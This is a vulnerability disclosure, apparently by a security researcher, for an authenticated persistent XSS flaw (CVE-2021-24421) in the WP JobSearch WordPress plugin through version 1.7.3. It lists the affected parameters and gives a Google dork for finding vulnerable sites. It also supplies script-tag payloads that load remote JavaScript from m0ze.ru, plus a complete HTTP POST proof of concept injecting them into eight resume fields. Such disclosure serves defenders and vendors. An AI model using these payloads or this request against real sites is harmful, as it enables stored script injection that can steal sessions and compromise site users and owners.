/*!
- # VULNERABILITY: WP JobSearch WordPress Plugin <= 1.7.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-jobsearch/
- # DATE: 2021-05-19
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Eyecix [ http://eyecix.com ]
- # SOFTWARE VERSION: <= 1.7.3
- # SOFTWARE LINK: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
- # CVSS: 3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- # CWE: CWE-79
- # CVE: CVE-2021-24421
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP JobSearch plugin through v1.7.3 for WordPress.

[i] Vulnerable parameter(s): &jobsearch_field_education_title[]=, &jobsearch_field_education_academy[]=, &jobsearch_field_experience_company[]=, &jobsearch_field_portfolio_title[]=, &jobsearch_field_portfolio_vurl[]=, &jobsearch_field_portfolio_url[]=, &jobsearch_field_skill_title[]=, &jobsearch_field_lang_title[]=.

[i] Theme(s) affected: Careerfy by Eyecix [ http://eyecix.com ].



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] <script src=//m0ze.ru/payload/a.js></script>

[$] "><script src=//m0ze.ru/payload/a.js></script><div 


### -- [ PoC | Authenticated Persistent XSS | Candidate Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2
Host: eyecix.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1612

jobsearch_field_resume_cover_letter=PoC&candidate_cover_file=&get_cand_skills%5B%5D=1553&jobsearch_field_education_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_start_date%5B%5D=May+29%2C+2021&jobsearch_field_education_end_date%5B%5D=&jobsearch_field_education_date_prsnt%5B%5D=on&jobsearch_field_education_academy%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_description%5B%5D=PoC&jobsearch_field_experience_title%5B%5D=1553&jobsearch_field_experience_start_date%5B%5D=May+29%2C+2021&jobsearch_field_experience_end_date%5B%5D=June+29%2C+2021&jobsearch_field_experience_date_prsnt%5B%5D=on&jobsearch_field_experience_company%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_experience_description%5B%5D=PoC&add_portfolio_img=&jobsearch_field_portfolio_title%5B%5D="><script+src%3d//m0ze.ru/payload/a.js></script><div%20&add_portfolio_img=&jobsearch_field_portfolio_image%5B%5D=921218418&jobsearch_field_portfolio_vurl%5B%5D="><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_portfolio_url%5B%5D="><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_skill_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_skill_percentage%5B%5D=88&jobsearch_field_lang_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_lang_level%5B%5D=proficient&jobsearch_field_lang_percentage%5B%5D=88&jobsearch_field_award_title%5B%5D=1553&jobsearch_field_award_year%5B%5D=2021&jobsearch_field_award_description%5B%5D=PoC&user_resume_form=1&terms_cond_check=on



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze